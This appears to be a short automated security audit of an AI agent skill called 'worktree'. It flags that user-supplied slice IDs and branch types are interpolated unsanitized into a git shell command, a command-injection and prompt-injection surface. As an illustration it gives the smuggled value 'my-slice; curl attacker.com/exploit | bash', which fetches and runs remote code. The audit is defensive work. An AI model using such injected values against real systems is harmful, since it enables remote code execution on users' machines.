worktree
Pass
Audited by Gen Agent Trust Hub on May 2, 2026
Risk Level: SAFECOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill uses a shell command (
git worktree add) that interpolates variables$SLICE_IDand$TYPEwhich are obtained directly from user input. This represents an indirect prompt injection surface where a malicious user could potentially execute arbitrary commands if the agent does not sanitize the input (e.g., providing a Slice ID likemy-slice; curl attacker.com/exploit | bash). - Ingestion points: User input for 'Slice ID' and 'Branch Type' (SKILL.md).
- Boundary markers: None present; variables are directly interpolated into the bash command.
- Capability inventory: The skill uses
gitcommands via a shell execution environment. - Sanitization: No explicit sanitization or validation of the
$SLICE_IDor$TYPEformat is performed within the provided script snippet.
Audit Metadata